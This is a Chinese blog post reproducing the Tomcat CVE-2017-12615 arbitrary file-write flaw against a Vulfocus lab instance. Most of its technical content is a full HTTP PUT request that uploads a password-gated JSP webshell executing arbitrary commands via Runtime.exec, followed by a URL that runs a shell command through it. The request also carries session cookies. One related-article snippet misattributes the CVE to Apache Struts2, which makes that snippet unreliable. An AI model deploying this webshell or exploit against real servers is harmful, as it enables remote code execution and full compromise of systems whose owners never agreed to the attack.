【Vulfocus漏洞复现】tomcat-cve_2017_12615

最新推荐文章于 2024-07-17 17:25:50 发布
最新推荐文章于 2024-07-17 17:25:50 发布
阅读量532 收藏 2
点赞数
分类专栏: vulfocus漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45632448/article/details/124018020
版权

访问目标

http://123.58.236.76:15450/

在这里插入图片描述
在这里插入图片描述
burp抓包
在这里插入图片描述
修改请求方式为PUT,增加POST请求体

PUT /shell.jsp/ HTTP/1.1
Host: 123.58.236.76:15450
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IlUzNGxjL1NvSjdQTzRWMjd1dVNvNHc9PSIsInZhbHVlIjoiNXlRQUpFWTlYek9CTnVkSmk4bzZza05QL3JLNTI4eHJYNHlDaWpsV0lLbjJkYXJpbFJjSXZvUFZYTDQzeTdLZTg1cFc2TmV0OUY0UWVIaXlrZGEwc3dTc3gyaWxtTjJ5eVE1ZVN1TEZ3WFhSbVd1NXVVOE45SUxOQldjM3Z0QTciLCJtYWMiOiI4YzdjMjZmYWM3OGJhNTczZTMxMTUwODY5MGU3YTIzNDRiYjhhYmM5ZDNmNzNjNjFkMjgzMTgzMzVhMDRlMmZjIn0%3D; laravel_session=eyJpdiI6ImFCZS85SDczQXBwL1ZwUFJHUE0veEE9PSIsInZhbHVlIjoic082eUJBSFZrQ2NsOXRxakt6MkVLT0Y5Vk1SbnFDYlJNNkwwSWdpNGhycDN3ejYvaTE4WjBhMThlQnBUTWkwN2RSY3pXZXQwZlNXRTZsVW5OMW0yRmErZGVmeitYYktUbFA1QWhFN1hSMDZGTEJGVURhYlUxczBBbTRKY3hwWUwiLCJtYWMiOiJkYThhN2RmOGRiZjBjZjc1ZTBlNTM4MTQyZmUxOTcyMDllZDM0OTEzZDYxOWY3NzdjNmE1MzcyMTgyYjE0ZmFkIn0%3D; JSESSIONID=3D9771B252C8900C7201D5D0100C59ED
Connection: close

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

在这里插入图片描述
在这里插入图片描述
直接远程命令执行

http://123.58.236.76:15450/shell.jsp?pwd=123&cmd=ls /tmp

在这里插入图片描述

青果@
关注
专栏目录
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3490
vulfocus靶场、log4j2漏洞复现
漏洞复现-xampp-文件写入】vulfocus/xampp-cve_2013_2586
10-12 1382
【xampp-文件写入】写入本地
finecms XSS (CVE-2017-11629)
最新发布
qq_23003811的博客
07-17 318
Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。dayrui FineCms 5.0.10及之前的版本。四、漏洞复现(怎么拿flag)?
xampp-文件写入(CVE-2013-2586)
m0_65150886的博客
12-27 554
XAMPP 1.8.1的"/xampp/lang.php"页面存在注入漏洞,未授权用户可在本地磁盘内写入,本地文件 "lang.tmp"可以从远程机器上进行修改,可在目标用户浏览器中执行任意HTML或脚本代码,窃取用户凭证之类的敏感信息。2.访问http://ip:port/xampp/lang.php?4. 回到http://ip:port/xampp/splash.php。3.访问http://ip:port/xampp/lang.tmp。回显WriteIntoLocalDisk。
国产开源网络安全渗透测试集成靶场vulfocus
顺其自然~专栏
10-17 1774
进入项目所在的目录的vulfocus-api文件夹目录下,执行下面命令。
xampp mysql 注入_XAMPP 任意文件写入漏洞(CVE-2013-2586)
weixin_32310195的博客
01-19 920
发布日期:2013-09-26更新日期:2013-10-08受影响系统:xampp xampp 1.8.1描述:--------------------------------------------------------------------------------BUGTRAQ ID: 62665CVE ID: CVE-2013-2586XAMPP是跨平台开源Web服务器解决方案软件包,...
vulfocustomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1673
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
CVE-2017-5638 是S2-045漏洞的官方CVE编号,这表明了它是一个被广泛认可的安全漏洞。当Struts2尝试解析非标准的MIME类型时,比如“multipart/form-data; boundary=----WebKitFormBoundary”这类格式,如果没有正确...
使用vulfocus靶场复现Tomcat 任意写入文件漏洞CVE-2017-12615
R0ot
10-15 1082
访问192.168.229.130:50997即可打开tomcat 文件上传 (CVE-2017-12615)漏洞环境。修改GET类型为PUT,之后再 最下面插入冰蝎一句话木马,点击send返回201说明成功了。运行后可以看到报错了,JDK版本为11.0,冰蝎需要在Java1.8.0下运行。复制about:preferences到火狐浏览器中打开,配置代理。Tomcat 任意写入文件漏洞CVE-2017-12615)可以看到版本已经为1.8.0了,我们再次运行冰蝎子。搜索CVE-2017-12615
vulfocus靶场tomcat-cve_2017_12615 文件上传
没有故事
04-19 297
攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。默认情况下readonly是true,此时PUT和DELETE方法是被拒绝的,当readonly为false时,便会开启。Windows上的Apache Tomcat如果开启PUT方法(默认关闭),则存在此漏洞,攻击者可以利用该漏洞上传JSP文件,从而导致远程代码执行。7.0.0-7.0.81 影响版本。
[Vulfocus解题系列]Tomcat 远程代码执行漏洞(CVE-2017-12615)
00勇士王子的博客
01-03 1732
介绍 Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。 复现过程 访问根路径 burp抓包 修改第一行为PUT和增加POST请求体,修改后为 PUT /shell.jsp/ HTTP/1.1 Host: vulfocus.fofa.so:5
CVE-2017-12615 tomcat漏洞利用
yuan-ONE的博客
01-11 1902
1.搭建漏洞环境 参考github https://github.com/vulhub/vulhub.git  本文使用文件 vulhub/tomcat/CVE-2017-12615  使用docker-compose 运行靶机 2.执行PUT方法上传木马 #-d 指定内容 curl -v -X PUT -d "younglinuxer" 192.168.123.38:8080/1.jsp...
vulfocus——Tomcat任意写入文件漏洞(CVE-2017-12615)
Zichel77的博客
08-09 1193
打开靶场如图 根据提示,可以使用PUT方法上传任意文件,于是抓包 将其传给Repeater 将头修改为PUT,并上传jsp文件,注意上传的时候一般jsp都是不被允许上传的,所以我们需要绕过,主要有三种方法 注意!!!!PUT后面要有空格!!!!否则行不通!!!! 法一: 使用斜杠/,斜杠在文件名中是非法的,所以会被去除(Linux和Windows) PUT /x.jsp/ HTTP/1.1 法二: 使用空格%20,在Windows下不允许文件以空格结尾,因此上传到windo..
漏洞复现-Tomacat-文件上传】vulfocus/tomcat-cve_2017_12615
10-09 1380
【Tomacat-文件上传】
Tomcat任意写入文件漏洞CVE-2017-12615
hovcfuti的博客
10-12 80
Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。当在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏洞产生,(需要允许put请求)发送到repeater,修改请求方式为put,将写好的jsp木马放到请求体中。
vulfocus漏洞复现
08-21
根据引用的描述,已复现Vulfocus靶场漏洞有spring代码执行(CVE-2018-1273)。该漏洞是指当使用Spring Framework版本4.3.5之前的应用程序中使用了Expression Language(SpEL)的功能时,攻击者可以通过构造特定的SpEL表达式来执行任意代码。这可能导致远程攻击者在受影响的应用程序上执行恶意代码。 除了Vulfocus漏洞复现之外,根据引用,Drupal曝出了一个远程代码执行漏洞CVE-2018-7600),攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。 另外,引用提到了WordPress的远程代码执行漏洞CVE-2016-10033),该漏洞利用了PHPMailer漏洞,在WordPress Core代码中体现,攻击者可以利用该漏洞执行代码。 总结来说,Vulfocus漏洞复现的其中一个例子是spring代码执行漏洞CVE-2018-1273)。此外,还存在Drupal远程代码执行漏洞CVE-2018-7600)和WordPress远程代码执行漏洞CVE-2016-10033)。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[Vulfocus解题系列] 所复现漏洞总结](https://blog.csdn.net/qq_45813980/article/details/118720526)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值